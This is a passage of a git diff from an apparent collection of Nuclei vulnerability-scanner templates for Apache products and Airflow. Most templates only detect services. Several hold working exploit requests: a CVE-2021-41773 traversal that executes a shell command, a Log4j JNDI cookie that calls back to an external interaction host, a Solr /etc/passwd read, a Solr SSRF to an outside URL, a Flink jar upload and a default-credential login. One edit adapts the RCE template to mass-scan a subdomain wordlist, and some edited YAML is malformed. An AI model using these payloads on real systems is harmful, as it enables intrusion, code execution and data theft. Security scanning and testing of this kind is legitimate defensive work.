" + - "Traceback (most recent call last)" + condition: and + + - type: status + status: + - 500 \ No newline at end of file diff --git a/poc/airflow/airflow-default-login-234.yaml b/poc/airflow/airflow-default-login-234.yaml deleted file mode 100644 index 7addbc0c1a..0000000000 --- a/poc/airflow/airflow-default-login-234.yaml +++ /dev/null @@ -1,64 +0,0 @@ -id: airflow-default-login - -info: - name: Apache Airflow Default Login - author: pdteam - severity: high - description: An Apache Airflow default login was discovered. - reference: - - https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html - metadata: - shodan-query: title:"Sign In - Airflow" - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: airflow,default-login,apache - -requests: - - raw: - - | - GET /login/ HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - - | - POST /login/ HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}}/admin/airflow/login - - username={{username}}&password={{password}}&_csrf_token={{csrf_token}} - - attack: pitchfork - payloads: - username: - - airflow - password: - - airflow - - cookie-reuse: true - extractors: - - type: regex - name: csrf_token - group: 1 - internal: true - regex: - - 'type="hidden" value="(.*?)">' - - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - 'contains(body_1, "Sign In - Airflow")' - - 'contains(all_headers_2, "session=.")' - - 'status_code_2 == 302' - condition: and - - - type: word - words: - - 'You should be redirected automatically to target URL: ' - -# Enhanced by mp on 2022/03/22 diff --git a/poc/airflow/airflow-default-login.yaml b/poc/airflow/airflow-default-login-236.yaml similarity index 100% rename from poc/airflow/airflow-default-login.yaml rename to poc/airflow/airflow-default-login-236.yaml diff --git a/poc/airflow/airflow-detect-239.yaml b/poc/airflow/airflow-detect-239.yaml deleted file mode 100644 index f2d6d97aa2..0000000000 --- a/poc/airflow/airflow-detect-239.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: airflow-detect - -info: - name: Apache Airflow - author: pdteam - severity: info - tags: tech,apache,airflow - -requests: - - method: GET - path: - - "{{BaseURL}}/{{randstr}}" - - matchers-condition: and - matchers: - - - type: word - part: body - words: - - "Airflow 404 = lots of circles" - - - type: status - status: - - 404 \ No newline at end of file diff --git a/poc/airflow/airflow-detect.yaml b/poc/airflow/airflow-detect-240.yaml similarity index 100% rename from poc/airflow/airflow-detect.yaml rename to poc/airflow/airflow-detect-240.yaml diff --git a/poc/airflow/airflow-panel-241.yaml b/poc/airflow/airflow-panel-241.yaml deleted file mode 100644 index 8509d74c08..0000000000 --- a/poc/airflow/airflow-panel-241.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: airflow-admin-login-panel - -info: - name: Apache Airflow Admin Login Panel - author: pdteam - severity: info - description: An Apache Airflow admin login panel was discovered. - reference: - - https://airflow.apache.org/docs/apache-airflow/stable/security/webserver.html - tags: panel,apache,airflow,admin - metadata: - shodan-query: title:"Sign In - Airflow" - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 - -requests: - - method: GET - path: - - "{{BaseURL}}/login/" - - "{{BaseURL}}/admin/airflow/login" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "Airflow - Login" - - "Sign In - Airflow" - condition: or - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/21 diff --git a/poc/airflow/airflow-panel-244.yaml b/poc/airflow/airflow-panel-244.yaml new file mode 100644 index 0000000000..1df0b6c38b --- /dev/null +++ b/poc/airflow/airflow-panel-244.yaml @@ -0,0 +1,37 @@ +id: airflow-admin-login-panel + +info: + name: Apache Airflow Admin Login Panel + author: pdteam + severity: info + description: An Apache Airflow admin login panel was discovered. + reference: + - https://airflow.apache.org/docs/apache-airflow/stable/security/webserver.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + shodan-query: title:"Sign In - Airflow" + tags: panel,apache,airflow,admin + +requests: + - method: GET + path: + - "{{BaseURL}}/login/" + - "{{BaseURL}}/admin/airflow/login" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "Airflow - Login" + - "Sign In - Airflow" + condition: or + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/21 diff --git a/poc/apache/apache-axis-detect-340.yaml b/poc/apache/apache-axis-detect-340.yaml index 6f4d1ee697..541ec83207 100644 --- a/poc/apache/apache-axis-detect-340.yaml +++ b/poc/apache/apache-axis-detect-340.yaml @@ -7,10 +7,11 @@ info: description: Axis and Axis2 detection metadata: verified: true + max-request: 3 shodan-query: http.html:"Apache Axis" tags: tech,axis2,middleware,apache -requests: +http: - method: GET path: - "{{BaseURL}}" @@ -18,6 +19,7 @@ requests: - "{{BaseURL}}/axis/" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -33,3 +35,5 @@ requests: - type: status status: - 200 + +# digest: 4b0a00483046022100c038a9ca3babbe0905c9228f2f6a32ccfc217541f7d6d7fa56694398d76d0936022100afe6237444b76f388682bc2b0beeaa1134ac39be09dcc255402add222228036b:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/apache-axis-detect-341.yaml b/poc/apache/apache-axis-detect-341.yaml deleted file mode 100644 index 541ec83207..0000000000 --- a/poc/apache/apache-axis-detect-341.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: apache-axis-detect - -info: - name: apache-axis-detect - author: dogasantos - severity: info - description: Axis and Axis2 detection - metadata: - verified: true - max-request: 3 - shodan-query: http.html:"Apache Axis" - tags: tech,axis2,middleware,apache - -http: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/axis2/" - - "{{BaseURL}}/axis/" - - stop-at-first-match: true - - matchers-condition: and - matchers: - - type: word - words: - - "Validate" - - "Welcome" - - "Axis" - - "deployed" - - "installation" - - "Admin" - condition: and - - - type: status - status: - - 200 - -# digest: 4b0a00483046022100c038a9ca3babbe0905c9228f2f6a32ccfc217541f7d6d7fa56694398d76d0936022100afe6237444b76f388682bc2b0beeaa1134ac39be09dcc255402add222228036b:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/apache-cocoon-detect-342.yaml b/poc/apache/apache-cocoon-detect-342.yaml deleted file mode 100644 index 64f8870cf3..0000000000 --- a/poc/apache/apache-cocoon-detect-342.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: apache-cocoon-detect - -info: - name: Apache Cocoon detect - author: ffffffff0x - severity: info - metadata: - verified: true - max-request: 1 - shodan-query: http.html:"Apache Cocoon" - fofa-query: app="APACHE-Cocoon" - tags: apache,cocoon,tech - -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - matchers: - - type: word - part: header - words: - - "X-Cocoon-Version" - - extractors: - - type: regex - part: header - regex: - - 'X\-Cocoon\-Version:([ 0-9.]+)' - -# digest: 4a0a0047304502207c3d5c05569282470766be7f10fec3c51d0b735651fac58a14d156cfe1b9a315022100ac0031c5ee4914905f47336472e3c56e443937e733b2ae348e006042060158f3:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/apache-cocoon-detect.yaml b/poc/apache/apache-cocoon-detect.yaml new file mode 100644 index 0000000000..1d3b85ddc5 --- /dev/null +++ b/poc/apache/apache-cocoon-detect.yaml @@ -0,0 +1,27 @@ +id: apache-cocoon-detect +info: + name: Apache Cocoon detect + author: ffffffff0x + severity: info + metadata: + fofa-query: app="APACHE-Cocoon" + tags: apache,cocoon,tech + +requests: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + max-redirects: 2 + matchers: + - type: word + part: header + words: + - "X-Cocoon-Version" + + extractors: + - type: regex + part: header + regex: + - 'X\-Cocoon\-Version:([ 0-9.]+)' diff --git a/poc/apache/apache-config-344.yaml b/poc/apache/apache-config-344.yaml new file mode 100644 index 0000000000..c003edd7c2 --- /dev/null +++ b/poc/apache/apache-config-344.yaml @@ -0,0 +1,31 @@ +id: apache-config + +info: + name: Apache Configuration File - Detect + author: sheikhrishad + severity: medium + description: Apache configuration file was detected. + remediation: Remove the configuration file from the web root. + reference: + - https://httpd.apache.org/docs/2.4/configuring.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: config,exposure,apache + +http: + - method: GET + path: + - "{{BaseURL}}/apache.conf" + + matchers: + - type: dsl + dsl: + - "contains(body, '') && status_code == 200" + - "contains(body, '') && status_code == 200" + condition: or + +# digest: 490a0046304402206ce734229f3fe43a990eca7a176878c7d0261f607053ff05f58dec53f2a9220e02206ec277b5d9894ac13f11a80a1ee029b011fda4db93b7e47cb4310cce1411c5f8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/apache-config.yaml b/poc/apache/apache-config.yaml deleted file mode 100644 index ff29e6336f..0000000000 --- a/poc/apache/apache-config.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: apache-config - -info: - name: Apache Config file disclosure - author: sheikhrishad - severity: low - tags: config,exposure,apache - -requests: - - method: GET - path: - - "{{BaseURL}}/apache.conf" - - matchers: - - type: dsl - dsl: - - "contains(body, '') && status_code == 200" - - "contains(body, '') && status_code == 200" - condition: or \ No newline at end of file diff --git a/poc/apache/apache-druid-kafka-connect-rce.yaml b/poc/apache/apache-druid-kafka-connect-rce.yaml index c250daba2a..b41413d2da 100644 --- a/poc/apache/apache-druid-kafka-connect-rce.yaml +++ b/poc/apache/apache-druid-kafka-connect-rce.yaml @@ -17,8 +17,8 @@ info: cvss-score: 8.8 cve-id: CVE-2023-25194 cwe-id: CWE-502 - epss-score: 0.89626 - epss-percentile: 0.98692 + epss-score: 0.91098 + epss-percentile: 0.98573 cpe: cpe:2.3:a:apache:kafka_connect:*:*:*:*:*:*:*:* metadata: verified: true @@ -96,4 +96,4 @@ http: - type: status status: - 400 -# digest: 4a0a00473045022100f788a795856513e1cd0015cba30415da3dd2e1a04d54f3ce0b6fb0f6f63e6ec9022005b2370ad3db8893c2793d0916510d1ddd938746e3cb8ef40eec403e4e3218d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022031dfd87f39e6614c9f8aecf3c2d1ac8cda076cc1ed4095d2346acf2f1ca030e202210082e90d27b10d9006bb28eea8f2fbf3f1c61c04b02200a8c9a2db95b3a5871b24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/apache/apache-flink-unauth-rce-355.yaml b/poc/apache/apache-flink-unauth-rce-355.yaml index ddf35e73ce..cfb2281c08 100644 --- a/poc/apache/apache-flink-unauth-rce-355.yaml +++ b/poc/apache/apache-flink-unauth-rce-355.yaml @@ -1,34 +1,28 @@ id: apache-flink-unauth-rce - info: - name: Apache Flink - Remote Code Execution + name: Apache Flink Unauth RCE author: pikpikcu severity: critical - description: Apache Flink - reference: Apache Flink contains an unauthenticated remote code execution vulnerability. + tags: apache,flink,rce + reference: | - https://www.exploit-db.com/exploits/48978 - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 - https://github.com/LandGrey/flink-unauth-rce - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 - tags: apache,flink,rce,intrusive,unauth - requests: - raw: - | POST /jars/upload HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 187 Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3 --8ce4b16b22b58894aa86c421e8759df3 Content-Disposition: form-data; name="jarfile";filename="poc.jar" Content-Type:application/octet-stream - {{randstr}} + nuclei --8ce4b16b22b58894aa86c421e8759df3-- - matchers-condition: and matchers: - type: word @@ -45,5 +39,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/05/23 diff --git a/poc/apache/apache-flink-unauth-rce-358.yaml b/poc/apache/apache-flink-unauth-rce-358.yaml new file mode 100644 index 0000000000..ddf35e73ce --- /dev/null +++ b/poc/apache/apache-flink-unauth-rce-358.yaml @@ -0,0 +1,49 @@ +id: apache-flink-unauth-rce + +info: + name: Apache Flink - Remote Code Execution + author: pikpikcu + severity: critical + description: Apache Flink + reference: Apache Flink contains an unauthenticated remote code execution vulnerability. + - https://www.exploit-db.com/exploits/48978 + - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 + - https://github.com/LandGrey/flink-unauth-rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + tags: apache,flink,rce,intrusive,unauth + +requests: + - raw: + - | + POST /jars/upload HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3 + + --8ce4b16b22b58894aa86c421e8759df3 + Content-Disposition: form-data; name="jarfile";filename="poc.jar" + Content-Type:application/octet-stream + + {{randstr}} + --8ce4b16b22b58894aa86c421e8759df3-- + + matchers-condition: and + matchers: + - type: word + words: + - "application/json" + part: header + condition: and + - type: word + words: + - "success" + - "_poc.jar" + part: body + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/23 diff --git a/poc/apache/apache-flink-unauth-rce-359.yaml b/poc/apache/apache-flink-unauth-rce-359.yaml index 782eea435d..dbae4dd542 100644 --- a/poc/apache/apache-flink-unauth-rce-359.yaml +++ b/poc/apache/apache-flink-unauth-rce-359.yaml @@ -5,18 +5,16 @@ info: author: pikpikcu severity: critical description: Apache Flink - reference: Apache Flink contains an unauthenticated remote code execution vulnerability. - - https://www.exploit-db.com/exploits/48978 - - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 - - https://github.com/LandGrey/flink-unauth-rce + reference: Apache Flink contains an unauthenticated remote code execution vulnerability. - https://www.exploit-db.com/exploits/48978 - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 - https://github.com/LandGrey/flink-unauth-rce classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cve-id: + cvss-score: 10 cwe-id: CWE-77 + metadata: + max-request: 1 tags: apache,flink,rce,intrusive,unauth -requests: +http: - raw: - | POST /jars/upload HTTP/1.1 @@ -37,14 +35,16 @@ requests: - "application/json" part: header condition: and + - type: word words: - "success" - "_poc.jar" part: body condition: and + - type: status status: - 200 -# Enhanced by mp on 2022/05/23 +# digest: 4a0a00473045022100c23141a6f16f90c8fab66fa3b2c0a15f1a1e8764af83f977671389376049f79a02206e4a7c6f9fc1b8828421abed2d16188c020d5eb6277cfa5835a8d60a1314d352:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/apache-httpd-rce-362.yaml b/poc/apache/apache-httpd-rce-362.yaml new file mode 100644 index 0000000000..e5f0bcbea2 --- /dev/null +++ b/poc/apache/apache-httpd-rce-362.yaml @@ -0,0 +1,41 @@ +id: apache-httpd-rce + +info: + name: Apache HTTPd - 2.4.49 (CGI enabled) RCE + author: pdteam + severity: critical + description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by require all denied these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. + reference: + - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782 + - https://nvd.nist.gov/vuln/detail/CVE-2021-41773 + - https://twitter.com/ptswarm/status/1445376079548624899 + - https://github.com/blasty/CVE-2021-41773 + tags: cve,cve2021,rce,apache + +requests: + - raw: + - | + POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + echo Content-Type: text/plain; echo; id + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + condition: and + part: body + words: + - 'uid=' + - 'gid=' + - 'groups=' + + extractors: + - type: regex + regex: + - "(u|g)id=.*" diff --git a/poc/apache/apache-httpd-rce.yaml b/poc/apache/apache-httpd-rce.yaml index 89a987e51b..6c7d8e9b31 100644 --- a/poc/apache/apache-httpd-rce.yaml +++ b/poc/apache/apache-httpd-rce.yaml @@ -1,4 +1,5 @@ id: apache-httpd-rce + info: name: Apache HTTPd - 2.4.49 (CGI enabled) RCE author: pdteam @@ -10,11 +11,17 @@ info: - https://twitter.com/ptswarm/status/1445376079548624899 - https://github.com/blasty/CVE-2021-41773 tags: cve,cve2021,rce,apache + requests: - - raw: + - payloads: + Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt + attack: sniper + threads: 100 + + raw: - | POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 - Host: {{Hostname}} + Host: {{Subdomains}} Content-Type: application/x-www-form-urlencoded echo Content-Type: text/plain; echo; id @@ -23,6 +30,7 @@ requests: - type: status status: - 200 + - type: word condition: and part: body @@ -30,6 +38,7 @@ requests: - 'uid=' - 'gid=' - 'groups=' + extractors: - type: regex regex: diff --git a/poc/apache/apache-ofbiz-log4j-rce-366.yaml b/poc/apache/apache-ofbiz-log4j-rce-366.yaml deleted file mode 100644 index d86db343ec..0000000000 --- a/poc/apache/apache-ofbiz-log4j-rce-366.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: apache-ofbiz-log4j-rce - -info: - name: Apache OFBiz Log4j JNDI RCE - author: pdteam - severity: critical - tags: ofbiz,oast,log4j,rce,apache,jndi - -requests: - - raw: - - | - GET /webtools/control/main HTTP/1.1 - Host: {{Hostname}} - Cookie: OFBiz.Visitor=${jndi:ldap://${hostName}.{{interactsh-url}}} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the DNS Interaction - words: - - "dns" - - - type: regex - part: interactsh_request - regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - - extractors: - - type: regex - part: interactsh_request - group: 1 - regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output diff --git a/poc/apache/apache-ofbiz-log4j-rce.yaml b/poc/apache/apache-ofbiz-log4j-rce.yaml new file mode 100644 index 0000000000..1d604b8057 --- /dev/null +++ b/poc/apache/apache-ofbiz-log4j-rce.yaml @@ -0,0 +1,28 @@ +id: apache-ofbiz-log4j-rce +info: + name: Apache OFBiz Log4j JNDI RCE + author: pdteam + severity: critical + tags: ofbiz,oast,log4j,rce,apache,jndi +requests: + - raw: + - | + GET /webtools/control/main HTTP/1.1 + Host: {{Hostname}} + Cookie: OFBiz.Visitor=${jndi:ldap://${hostName}.{{interactsh-url}}} + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + extractors: + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output diff --git a/poc/apache/apache-solr-file-read-368.yaml b/poc/apache/apache-solr-file-read-368.yaml new file mode 100644 index 0000000000..8af1e2bc32 --- /dev/null +++ b/poc/apache/apache-solr-file-read-368.yaml @@ -0,0 +1,44 @@ +id: apache-solr-file-read + +info: + name: Apache Solr <= 8.8.1 Arbitrary File Read + author: DhiyaneshDk + severity: high + tags: apache,solr,lfi + reference: + - https://twitter.com/Al1ex4/status/1382981479727128580 + - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ + - https://twitter.com/sec715/status/1373472323538362371 + +requests: + - raw: + - | + GET /solr/admin/cores?wt=json HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Connection: close + + - | + GET /solr/{{core}}/debug/dump?stream.url=file:///etc/passwd¶m=ContentStream HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Connection: close + + + extractors: + - type: regex + internal: true + name: core + group: 1 + regex: + - '"name"\:"(.*?)"' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + regex: + - "root:.*:0:0:" \ No newline at end of file diff --git a/poc/apache/apache-solr-file-read.yaml b/poc/apache/apache-solr-file-read.yaml deleted file mode 100644 index 390f09194e..0000000000 --- a/poc/apache/apache-solr-file-read.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: apache-solr-file-read - -info: - name: Apache Solr <= 8.8.1 Arbitrary File Read - author: DhiyaneshDk - severity: high - reference: - - https://twitter.com/Al1ex4/status/1382981479727128580 - - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ - - https://twitter.com/sec715/status/1373472323538362371 - tags: apache,solr,lfi - -requests: - - raw: - - | - GET /solr/admin/cores?wt=json HTTP/1.1 - Host: {{Hostname}} - Accept-Language: en - Connection: close - - - | - GET /solr/{{core}}/debug/dump?stream.url=file:///etc/passwd¶m=ContentStream HTTP/1.1 - Host: {{Hostname}} - Accept-Language: en - Connection: close - - extractors: - - type: regex - internal: true - name: core - group: 1 - regex: - - '"name"\:"(.*?)"' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: regex - regex: - - "root:.*:0:0:" \ No newline at end of file diff --git a/poc/apache/apache-storm-unauth.yaml b/poc/apache/apache-storm-unauth.yaml index dc48849fe9..2a2c45e566 100644 --- a/poc/apache/apache-storm-unauth.yaml +++ b/poc/apache/apache-storm-unauth.yaml @@ -1,20 +1,14 @@ id: apache-storm-unauth - info: name: Apache Storm Unauth author: pikpikcu severity: medium - reference: - - https://storm.apache.org/releases/current/STORM-UI-REST-API.html - metadata: - max-request: 1 + reference: https://storm.apache.org/releases/current/STORM-UI-REST-API.html tags: apache,unauth,misconfig - -http: +requests: - method: GET path: - '{{BaseURL}}/api/v1/cluster/summary' - matchers-condition: and matchers: - type: word @@ -23,9 +17,6 @@ http: - '"totalMem":' - '"stormVersion":' condition: and - - type: status status: - 200 - -# digest: 490a0046304402206445294e1d237514858065f44d0ca332874876a4071b4163c436a74f803abb6c022066822b6f0d9f4fa25b39da6bec4db4aef6067a7a6d78391697a8022dc4131691:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/apache-tomcat-snoop-377.yaml b/poc/apache/apache-tomcat-snoop-377.yaml deleted file mode 100644 index 9cb1ec5328..0000000000 --- a/poc/apache/apache-tomcat-snoop-377.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: apache-tomcat-snoop - -info: - name: Apache Tomcat example page disclosure - snoop - author: pdteam - severity: low - description: The following example scripts that come with Apache Tomcat v4.x - v7.x and can be used by attackers to gain information about the system. These scripts are also known to be vulnerable to cross site scripting (XSS) injection. - reference: - - https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks - tags: apache,misconfig,tomcat,disclosure - -requests: - - method: GET - path: - - "{{BaseURL}}/examples/jsp/snp/snoop.jsp" - - matchers-condition: and - matchers: - - type: word - words: - - 'Request URI: /examples/jsp/snp/snoop.jsp' - - - type: status - status: - - 200 diff --git a/poc/apache/apachesolrlfissrf.yaml b/poc/apache/apachesolrlfissrf.yaml index 823da4830c..c69e2990a7 100644 --- a/poc/apache/apachesolrlfissrf.yaml +++ b/poc/apache/apachesolrlfissrf.yaml @@ -1,55 +1,38 @@ id: CVE-2021-27905 info: - name: Apache Solr <=8.8.1 - Server-Side Request Forgery - author: hackergautam + name: Apache Solr <= 8.8.1 SSRF & Arbitrary File Read + author: nithisshapachesolrlfissrf severity: critical - description: Apache Solr versions 8.8.1 and prior contain a server-side request forgery vulnerability. The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. - remediation: This issue is resolved in Apache Solr 8.8.2 and later. - reference: - - https://www.anquanke.com/post/id/238201 - - https://ubuntu.com/security/CVE-2021-27905 - - https://nvd.nist.gov/vuln/detail/CVE-2021-27905 - - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ - - https://lists.apache.org/thread.html/r0ddc3a82bd7523b1453cb7a5e09eb5559517145425074a42eb326b10%40%3Cannounce.apache.org%3E - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-27905 - cwe-id: CWE-918 - epss-score: 0.94485 - epss-percentile: 0.99023 - cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: apache - product: solr - tags: cve,cve2021,apache,solr,ssrf + tags: cve2021-27905,lfi,apache,solr,ssrf + reference: | + + - https://nvd.nist.gov/vuln/detail/CVE-2021-27905 -http: +requests: - raw: - | GET /solr/admin/cores?wt=json HTTP/1.1 Host: {{Hostname}} Accept-Language: en Connection: close + - | - GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://interact.sh HTTP/1.1 + GET /solr/%7Bcore%7D/replication/?command=fetchindex&masterUrl=https://bugbounty.requestcatcher.com/ssrf HTTP/1.1 Host: {{Hostname}} Accept-Language: en Connection: close - matchers: - - type: word - part: body - words: - - 'OK' - extractors: - type: regex - name: core - group: 1 regex: - - '"name"\:"(.*?)"' + - '"status"\:\{"(.*?)"\:\{"name"' + name: collection + group: 1 internal: true -# digest: 4a0a00473045022100846d3f03cba36c9a29cae22437f54e258aecb3088b528499a473d5729922123b02200195825092238941d4a32c54d4735612308d7493d8ef0c31fd7df83b5552ecc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" + part: body diff --git a/poc/apache/default-apache-test-all-6814.yaml b/poc/apache/default-apache-test-all-6814.yaml index 4004d97de2..480d651a06 100644 --- a/poc/apache/default-apache-test-all-6814.yaml +++ b/poc/apache/default-apache-test-all-6814.yaml @@ -3,11 +3,11 @@ id: default-apache-test-all info: name: Apache HTTP Server Test Page author: andydoering - description: Detects default installations of apache (not just apache2 or installations on CentOS) severity: info - tags: tech,apache + description: Detects default installations of apache (not just apache2 or installations on CentOS) metadata: shodan-query: http.title:"Apache+Default","Apache+HTTP+Server+Test","Apache2+It+works" + tags: tech,apache requests: - method: GET @@ -15,8 +15,8 @@ requests: - '{{BaseURL}}' matchers: - - type: regex # type of the extractor - part: body # part of the response (header,body,all) + - type: regex # type of the extractor + part: body # part of the response (header,body,all) condition: or regex: - ".*?Apache(|\\d+) .*?(Default|Test).*?" @@ -26,4 +26,4 @@ requests: - type: kval part: header kval: - - server \ No newline at end of file + - server diff --git a/poc/apache/default-apache-test-all.yaml b/poc/apache/default-apache-test-all.yaml new file mode 100644 index 0000000000..4004d97de2 --- /dev/null +++ b/poc/apache/default-apache-test-all.yaml @@ -0,0 +1,29 @@ +id: default-apache-test-all + +info: + name: Apache HTTP Server Test Page + author: andydoering + description: Detects default installations of apache (not just apache2 or installations on CentOS) + severity: info + tags: tech,apache + metadata: + shodan-query: http.title:"Apache+Default","Apache+HTTP+Server+Test","Apache2+It+works" + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: regex # type of the extractor + part: body # part of the response (header,body,all) + condition: or + regex: + - ".*?Apache(|\\d+) .*?(Default|Test).*?" + - "(Default|Test).*? Apache(|\\d+).*?" + + extractors: + - type: kval + part: header + kval: + - server \ No newline at end of file diff --git a/poc/apache/default-apache-test-page-6816.yaml b/poc/apache/default-apache-test-page-6816.yaml deleted file mode 100644 index 268acbeed0..0000000000 --- a/poc/apache/default-apache-test-page-6816.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: default-apache-test-page - -info: - name: Apache HTTP Server Test Page - author: dhiyaneshDk - severity: info - metadata: - max-request: 1 - shodan-query: http.title:"Apache HTTP Server Test Page powered by CentOS" - tags: tech,apache - -http: - - method: GET - path: - - '{{BaseURL}}' - - matchers: - - type: word - words: - - "Apache HTTP Server Test Page powered by CentOS" - part: body - -# digest: 490a004630440220467bbb3dc60687ff2f264d427b2bbef67eaf91265d2792c09daa9032b6fa344802204ffb8d5ea0e7243efd0a890758cf097189637da7837623d9d55956ef739fc474:922c64590222798bb761d5b6d8e72950 diff --git a/poc/apache/default-apache-test-page-6817.yaml b/poc/apache/default-apache-test-page-6817.yaml index d76fd5ac60..f727151d6a 100644 --- a/poc/apache/default-apache-test-page-6817.yaml +++ b/poc/apache/default-apache-test-page-6817.yaml @@ -4,9 +4,8 @@ info: name: Apache HTTP Server Test Page author: dhiyaneshDk severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22Apache+HTTP+Server+Test+Page+powered+by+CentOS%22 tags: tech,apache + reference: https://www.shodan.io/search?query=http.title%3A%22Apache+HTTP+Server+Test+Page+powered+by+CentOS%22 requests: - method: GET diff --git a/poc/apache/default-apache2-page-6805.yaml b/poc/apache/default-apache2-page-6805.yaml index a123e40b22..2aa462ac02 100644 --- a/poc/apache/default-apache2-page-6805.yaml +++ b/poc/apache/default-apache2-page-6805.yaml @@ -4,11 +4,12 @@ info: name: Apache2 